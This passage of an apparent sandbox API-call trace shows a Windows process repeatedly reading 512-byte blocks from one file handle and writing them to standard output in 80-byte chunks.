0x1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.721] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.722] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.723] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.724] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.725] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.726] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.727] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, 